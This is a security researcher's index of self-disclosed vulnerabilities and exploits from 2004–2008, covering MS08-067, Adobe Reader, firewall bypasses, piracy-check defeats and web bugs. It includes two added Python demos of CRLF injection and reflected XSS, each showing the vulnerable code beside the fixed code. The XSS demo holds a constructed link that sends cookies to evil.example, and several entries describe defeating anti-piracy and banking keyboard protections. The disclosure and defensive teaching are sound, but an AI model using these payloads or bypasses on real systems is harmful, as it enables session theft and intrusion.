Vulnerability Research & Exploit Development
Note: All the vulnerabilities/exploits listed here were researched and discovered by me, except the ones highlighted in blue (in those cases only the exploit is by me). In other words, vulnerabilities highlighted in blue were not discovered by me, but the published exploit code is mine.
To support my work, make a donation.
Microsoft Windows Server Service (MS08-067) Exploit
Release Date: 17th Nov, 2008

Description: This exploit demonstrates the vulnerability in the Microsoft Windows Server Service (SRVSVC). The download includes the Python exploit script. Presently the exploit only works against Windows 2000 and Windows 2003 SP2. I have no plans as such to plug in the XP payload; in case I get time I may update it in future.
Download Link: srvsvc[ms08-067] exploit

Copyright © 2008 Debasis Mohanty
Adobe Reader JavaScript printf Buffer Overflow Exploit
Release Date: 6th Nov, 2008

Description: This exploit demonstrates the vulnerability in the Adobe Reader JavaScript util.printf method (CVE-2008-2992). The download includes the exploit script, which needs to be embedded into a PDF file to test the exploit.
Download Link: Adobe CVE-2008-2992 [TXT]
*Disabling GDS Desktop Link Integration In Google Pages
Release Date: 27th Feb, 2007

Description: This article discusses why the GDS (Google Desktop Search) issues revolve primarily around the GDS Desktop link, and how to fix them permanently by disabling it, so that users can still use GDS without fear of exploits targeted at the desktop link.
Download Link: gds-desktoplink-fix
Defeating Microsoft Office Genuine Advantage (OGA) Check
Release Date: 29th Jan, 2007

Description: To put it plainly, there are 101 ways to defeat such a lame attempt to prevent piracy or to control illegal use of software. The PoC describes two different methods of defeating the Office Genuine Advantage validation check.

Proof-of-Concept: defeat-oga

Bugtraq ID: NA CVE: NA Other Related Links: to be updated
Google AdWords Multiple HTTP Response Splitting Vulnerabilities
Release Date: 14th Dec, 2006

Description: Multiple CRLF injection (aka HTTP response splitting) vulnerabilities were identified in Google AdWords. A remote attacker could exploit them to inject arbitrary HTTP headers into the server's response.

Proof-of-Concept: adwords-crlf-injection

Bugtraq ID: NA CVE: NA Other Related Links: Zone-H Media Publications: internetnews.com
Multiple HTTP Response Splitting Vulnerabilities in SHOP-SCRIPT
Release Date: 23rd Oct, 2006

Description: Multiple CRLF injection (aka HTTP response splitting) vulnerabilities were identified in Shop-Script PREMIUM. A remote attacker could exploit them to inject arbitrary HTTP headers into the server's response.

Proof-of-Concept: shop-script crlf injection

Bugtraq ID: 20685 CVE: CVE-2006-5566 Other Related Links: FrSIRT, Secunia.com
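The AdWords and Shop-Script entries above both describe the same bug class: a user-supplied value is copied into a response header without checking for CR/LF, so the attacker can terminate the header block and append a complete second response. The following is an added example, not the author's PoC or code from either product; the redirect endpoint, the payload and the naive client-side parser are constructed for illustration. It shows the vulnerable header builder beside a hardened one that refuses CR, LF and NUL in header values, and uses the parser to count how many responses a naive client would perceive from each.

```python
"""HTTP response splitting (CRLF injection): vulnerable vs hardened redirect builder.

Added example; the endpoint, payload and parser below are constructed for
illustration and are not taken from the AdWords or Shop-Script advisories.
"""
from __future__ import annotations

# Constructed attacker value for a redirect-target parameter. The first CRLF
# ends the Location header, the blank line ends the first response's headers,
# and everything after it is a complete second response chosen by the attacker.
CONSTRUCTED_PAYLOAD = (
    "/home\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 25\r\n"
    "\r\n"
    "<script>alert(1)</script>"
)


def build_redirect_vulnerable(location: str) -> bytes:
    """Writes the user-supplied value into the Location header verbatim."""
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def is_safe_header_value(value: str) -> bool:
    """RFC 7230 field values may not contain bare CR, LF or NUL; any of them
    lets the value terminate the header line or the whole header block."""
    return not any(ch in value for ch in ("\r", "\n", "\x00"))


def build_redirect_hardened(location: str) -> bytes:
    """Same response format, but refuses values that could split it."""
    if not is_safe_header_value(location):
        raise ValueError("CR/LF/NUL in header value")
    return build_redirect_vulnerable(location)  # safe once the value is checked


def split_responses(raw: bytes) -> list[dict]:
    """Parses the byte stream like a naive HTTP/1.1 client: status line, headers,
    then exactly Content-Length body bytes, repeated while a status line follows.
    Returns one dict per response the client would perceive."""
    responses: list[dict] = []
    pos = 0
    while pos < len(raw):
        head_end = raw.find(b"\r\n\r\n", pos)
        if head_end < 0:
            break
        status, *header_lines = raw[pos:head_end].decode("latin-1").split("\r\n")
        if not status.startswith("HTTP/"):
            break  # leftover bytes that are not a response; stop here
        headers: dict[str, str] = {}
        for line in header_lines:
            name, _, val = line.partition(":")
            headers[name.strip().lower()] = val.strip()
        body_start = head_end + 4
        length = int(headers.get("content-length", "0"))
        body = raw[body_start:body_start + length].decode("latin-1")
        responses.append({"status": status, "headers": headers, "body": body})
        pos = body_start + length
    return responses


def count_responses(location: str, hardened: bool = False) -> int:
    """How many responses a naive client sees for one redirect with this value."""
    builder = build_redirect_hardened if hardened else build_redirect_vulnerable
    return len(split_responses(builder(location)))


if __name__ == "__main__":
    for resp in split_responses(build_redirect_vulnerable(CONSTRUCTED_PAYLOAD)):
        print(resp["status"], resp["headers"], repr(resp["body"]))
    print("hardened:", count_responses("/home", hardened=True), "response(s)")
```

Rejecting the value outright is the right default for a redirect target; percent-encoding the control characters instead would silently redirect the user somewhere they did not ask for. The same check belongs on every header that echoes input (Set-Cookie, Content-Disposition, custom headers), not just Location.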
Microsoft Excel File Embedded Shockwave Flash Object Exploit
Release Date: 20th Jun, 2006

Description: Malicious Flash files with embedded JavaScript can be inserted into Excel spreadsheets as a "Shockwave Flash Object" and made to run as soon as the file is opened. No user interaction is required to activate the object; it runs automatically once the file is opened.

Proof-of-Concept: xls-embed-swf-expl

Bugtraq ID: 18583 CVE: CVE-2006-3014 Other Related Links: Microsoft Bulletin, Juniper, SecuriTeam, ISS X-Force, Adobe, FrSIRT
Firefox (with IETab Plugin) Null Pointer Dereference Bug
Release Date: 17th May, 2006

Description: Firefox with IETab installed crashes when the IETab plugin is unable to handle specific JavaScript. It appears to be a null pointer dereference. Refer to the PoC (Proof of Concept) for details.

Proof-of-Concept: ff-ietab-die

Bugzilla Bug: 14151 CVE: CVE-2006-2538 Other Related Links: nist.gov, ISS X-Force
w3wp Remote DoS Due to Improper Reference of STA COM Components in ASP.NET
Release Date: 21st Mar, 2006

Description: Developers often forget the "AspCompat" page directive, which is required when an ASP.NET page references single-threaded apartment (STA) COM components. A missing AspCompat directive causes general instability and poor performance of the web application; a simple increase in load on the web server may be enough to crash it. After working for more than a month with Microsoft (MSRC) on this issue, it was finally concluded that the w3wp crash can occur unexpectedly and is due to improper referencing of COM or COM+ components from ASP.NET applications. Refer to the PoC (Proof of Concept) for details.

Proof-of-Concept: w3wp-remote-dos

Bugtraq ID: 17188 CVE: CVE-2006-1364 Other Related Links: SecuriTeam, security.nnov.ru, ISS X-Force, nist.gov, milw0rm
Google Reader 'Preview' and 'Lens' Script Improper Feed Validation Vulnerability
Release Date: 22nd Feb, 2006

Description: Google Reader is an RSS and Atom feed reader that displays only the content the user has subscribed to. However, two vulnerabilities were identified that may allow an attacker to entice a victim using the Google Reader service into viewing unwanted web content carrying malicious payloads.

Proof-of-Concept: google-reader-vuln

Bugtraq ID: * CVE: * Other Related Links: Zone-H, Anti-Phishing Italia
phpMyChat Identical User Id and Password Authentication Bypass Vulnerability
Release Date: 20th Feb, 2006

Description: In the default installation of phpMyChat (version 0.14.5), any unregistered user can gain access to the chat rooms by entering an identical user name and password in the login box, i.e. the user name must be the same as the password. I tried logging in to various vulnerable sites using identical user id and password combinations, which granted me unauthorized access to the rooms.

Proof-of-Concept: phpMyChat-Auth-Bypass

Bugtraq ID: * CVE: * Other Related Links: ISS X-Force, OSVDB, security.nnov.ru
Zone Labs Products Advanced Program Control and OS Firewall (Behavioral Based) Technology Bypass Vulnerability
Release Date: 8th Nov, 2005

Description: Zone Alarm products with Advanced Program Control or OS Firewall technology enabled detect and block almost all of the APIs (such as Shell, ShellExecuteEx, SetWindowText, SetDlgItem, etc.) that malicious programs commonly use to send data over HTTP by piggybacking on other trusted programs. However, it is still possible for a malicious program (a Trojan, worm, etc.) to make outbound connections to an attacker's site by piggybacking on the trusted Internet browser using an "HTML Modal Dialog" in conjunction with simple JavaScript. This assumes that the default browser (IE, Firefox, etc.) is authorized to access the Internet.

Proof-of-Concept: osfwbypass-demo.zip

Bugtraq ID: 15347 CVE: CVE-2005-3560 Other Related Links: Securityfocus, OSVDB, Secunia, ISS X-Force, SecuriTeam
Bypassing Zone Alarm Firewall Using DDE-IPC
Release Date: 28th Sep, 2005

Description: While I was testing desktop-based firewalls (here Zone Alarm Pro and the free version) with the firewall evasion kit developed by me, I found that a very old flaw still exists in many of the latest versions of desktop-based firewalls. It is possible for a malicious program to bypass a desktop-based firewall by using DDE-IPC (Dynamic Data Exchange interprocess communication), which enables an untrusted program to communicate with the attacker or access the Internet via other trusted programs (e.g. Internet Explorer). This flaw has been known since before 2003.

Proof-of-Concept: zabypass.zip

Bugtraq ID: 14966 CVE: * Other Related Links: Zone Labs Advisory, Securityfocus, FrSIRT Media Publications: news.zdnet.com
Defeating Citi-Bank Virtual Keyboard Protection
Release Date: 6th Aug, 2005

Description: Early this year, Citi-Bank introduced the concept of a Virtual Keyboard to defend against malicious programs such as keyloggers, Trojans and spyware. However, the Virtual Keyboard can be easily defeated by using Win32 APIs to access the HTML document. Refer to the PoC (Proof of Concept) for details.

Proof-of-Concept: defeat-citibank-vk.zip

Bugtraq ID: * CVE: * Other Related Links: ISS X-Force, US-CERT, Virus.org, Hacknthebox.org
Indiatimes Shopping Cart XSS (Cross Site Scripting) Vulnerability
Release Date: 29th July, 2005

Description: Indiatimes Shopping is one of the largest shopping and auction portals in India. The Indiatimes Shopping Cart (http://store.indiatimes.com) can be exploited by a malicious user to conduct cross-site scripting and script insertion attacks. Input passed to certain parameters in various scripts is not properly sanitised before it is returned to the user. This can be exploited to execute arbitrary HTML or script code in a user's browser session in the context of the affected site by tricking the user into visiting a malicious website or following a specially crafted link.

Proof-of-Concept: Indiatimes-sc-xss

Bugtraq ID: * CVE: * Other Related Links: security.nnov.ru
Defeating Microsoft WGA (Windows Genuine Advantage) Validation Check
Release Date: 23rd May, 2005

Description: WGA (Windows Genuine Advantage) is a mechanism introduced by Microsoft that builds a genuine-product check into a few of its public beta products, performed before the product is installed. MS products or tools with the WGA check enabled can only be installed on a valid, genuine copy of Windows XP; on a pirated copy the product refuses to install. If you are already familiar with WGA validation you can jump straight to the PoC section; otherwise it is advisable to read up on WGA and what it does before reading the PoC.

Proof-of-Concept: defeating-wga-check.zip

Bugtraq ID: * CVE: * Other Related Links: OSVDB Media Publications: news.com, timesofindia, pcmag, rediff-news, businessstandard
CuteNews 'archive' Parameter XSS (Cross Site Scripting) Vulnerability
Release Date: 16th Aug, 2004

Description: The CuteNews "archive" parameter is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. An attacker can embed HTML or JavaScript in the archive parameter of a specially crafted URL request to the show_archive.php script, which is then executed in the victim's web browser within the security context of the hosting site. An attacker can also use this vulnerability to steal the victim's cookie-based authentication credentials.

Proof-of-Concept: cutenews-xss

Bugtraq ID: 10948 CVE: * Other Related Links: Securityfocus, OSVDB, Secunia, ISS X-Force Nessus Plugin: nessus-plugin
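The Indiatimes and CuteNews entries both describe reflected cross-site scripting: a query parameter is written back into the page without validation or encoding, so a crafted link executes script in the victim's session and can read the session cookie. The following is an added example, not the author's PoC and not CuteNews or Indiatimes code; the host names, the page template and the assumption that archive identifiers are plain decimal numbers are all constructed for illustration. It shows the raw reflection beside a hardened handler that validates the parameter and HTML-escapes it (quotes included, since the value lands inside an attribute), and a Set-Cookie header that limits the cookie-theft consequence.

```python
"""Reflected XSS in a URL parameter: raw reflection vs validation plus output encoding.

Added example; the host names, the archive-id format and the page template
are constructed for illustration and are not CuteNews or Indiatimes code.
"""
from __future__ import annotations

import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed attacker link: the archive parameter closes the attribute it is
# reflected into and opens a script tag that ships document.cookie off-site.
CONSTRUCTED_URL = (
    "http://news.example/show_archive.php?archive="
    "%22%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil.example%2F%3Fc%3D%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)

# Assumption for the demo: archive identifiers are plain decimal numbers.
ARCHIVE_ID_RE = re.compile(r"[0-9]{1,12}")


def archive_param(url: str) -> str:
    """Extracts the decoded 'archive' query parameter as the server would see it."""
    return parse_qs(urlsplit(url).query).get("archive", [""])[0]


def render_vulnerable(archive: str) -> str:
    """Reflects the parameter unchanged into an attribute and a text node."""
    return (
        f'<input type="hidden" name="archive" value="{archive}">\n'
        f"<h2>Archive {archive}</h2>"
    )


def is_valid_archive_id(archive: str) -> bool:
    """Input validation: accept only the format the application expects."""
    return ARCHIVE_ID_RE.fullmatch(archive) is not None


def render_hardened(archive: str) -> str:
    """Output encoding: HTML-escape the value, quotes included, so it can neither
    close the attribute nor start a tag. This alone neutralises the payload."""
    safe = html.escape(archive, quote=True)
    return (
        f'<input type="hidden" name="archive" value="{safe}">\n'
        f"<h2>Archive {safe}</h2>"
    )


def handle_request(url: str) -> tuple[int, str]:
    """Validation in front of encoding: reject ids that do not match the expected
    format and encode the ones that do. Returns (status, body)."""
    archive = archive_param(url)
    if not is_valid_archive_id(archive):
        return 400, "<h2>Bad request</h2>"
    return 200, render_hardened(archive)


def reflects_live_script(page: str) -> bool:
    """Check used by the demo: does a raw <script tag survive into the output?"""
    return "<script" in page.lower()


def session_cookie_header(name: str, value: str) -> str:
    """Limits the cookie-theft consequence only: HttpOnly hides the cookie from
    document.cookie, Secure keeps it off plain HTTP. It does not fix the XSS."""
    return f"Set-Cookie: {name}={value}; Path=/; HttpOnly; Secure"


if __name__ == "__main__":
    payload = archive_param(CONSTRUCTED_URL)
    print(render_vulnerable(payload))
    print(render_hardened(payload))
    print(handle_request(CONSTRUCTED_URL))
```

Escaping must match the context the value is written into: html.escape with quote=True is correct for element text and quoted attributes, but a value placed inside a script block or a URL needs JavaScript or URL encoding instead. Validation is the first line, encoding the second; the HttpOnly flag only reduces what a successful injection can steal.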
-- :: Tr0y/n0psl3d (a.k.a Debasis Mohanty) :: --
For all your queries / comments / love / hate / flames / appreciations, shoot a mail at:
d3basis . m0hanty [AT] gmail . com